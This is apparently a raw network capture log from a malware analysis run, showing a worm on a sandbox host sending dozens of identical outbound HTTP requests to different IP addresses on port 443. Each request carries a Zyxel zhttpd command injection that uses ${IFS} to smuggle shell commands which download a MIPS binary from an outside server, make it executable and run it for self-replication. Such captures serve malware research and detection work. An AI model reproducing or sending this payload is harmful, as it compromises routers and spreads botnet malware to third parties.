                                        Jan 14, 2024 16:18:33.184108973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1345192.168.2.136006242.22.236.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184150934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1346192.168.2.135110423.97.26.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184192896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1347192.168.2.1342536122.216.108.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184242010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1348192.168.2.134440096.236.133.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184272051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1349192.168.2.1358356167.56.197.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184324026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1350192.168.2.1342026130.229.32.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184360981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1351192.168.2.1333648142.135.80.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184376955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1352192.168.2.133769682.137.202.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184438944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1353192.168.2.134640296.252.127.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184470892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1354192.168.2.1359626119.11.202.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184494019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1355192.168.2.135337240.193.26.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184535980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1356192.168.2.1360656109.158.228.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184585094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1357192.168.2.1342000104.45.159.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184618950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1358192.168.2.1346642195.130.46.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184652090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1359192.168.2.1357026137.124.186.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184695959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1360192.168.2.134002069.66.235.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184734106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1361192.168.2.13418461.67.248.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184767008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1362192.168.2.135019862.100.184.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184815884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1363192.168.2.135429479.120.41.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184863091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1364192.168.2.134225477.53.170.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184902906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1365192.168.2.13566761.195.249.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184937000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1366192.168.2.134617232.74.112.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.184972048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1367192.168.2.134879688.254.96.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185029030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1368192.168.2.133713020.19.51.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185061932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1369192.168.2.1338800149.221.192.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185101032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1370192.168.2.1349764164.215.129.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185148954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1371192.168.2.1349612189.30.195.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185175896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1372192.168.2.1351976176.20.166.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185229063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1373192.168.2.1358240105.156.100.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185252905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1374192.168.2.134477696.215.173.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185286999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1375192.168.2.1339126132.234.118.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185338020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1376192.168.2.1348240168.170.148.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185374975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1377192.168.2.1334294179.167.98.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185456991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1378192.168.2.13478802.42.142.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185488939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1379192.168.2.1336250208.162.10.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185523987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1380192.168.2.134962017.149.56.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185583115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1381192.168.2.1336340149.181.226.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185615063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1382192.168.2.135945052.16.193.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185671091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1383192.168.2.134218235.120.151.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185705900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1384192.168.2.13438885.215.126.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185730934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1385192.168.2.135578841.24.63.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185792923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1386192.168.2.134869035.50.233.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185837030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1387192.168.2.1337074136.4.28.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185861111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1388192.168.2.133458823.197.2.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185905933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1389192.168.2.1336982134.147.129.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185936928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1390192.168.2.135085444.175.118.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.185992002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1391192.168.2.1338094128.75.72.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186038971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1392192.168.2.1342556167.200.171.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186084986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1393192.168.2.135210888.145.84.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186113119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1394192.168.2.1355038131.228.39.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186178923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1395192.168.2.1355992101.32.100.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186213970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1396192.168.2.1340710197.27.88.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186265945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1397192.168.2.1345948144.224.58.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186302900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1398192.168.2.1335314175.64.101.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186331987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1399192.168.2.133939676.219.171.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186364889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1400192.168.2.1359646209.86.239.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186420918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1401192.168.2.1346790123.55.76.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186455011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1402192.168.2.133683099.64.177.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186496973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1403192.168.2.135572817.254.222.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186538935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1404192.168.2.133775063.192.101.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186580896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1405192.168.2.1355584144.241.176.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186613083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1406192.168.2.133683091.246.125.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186666012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1407192.168.2.135339489.212.227.172443
                                        TimestampBytes transferredDirectionData
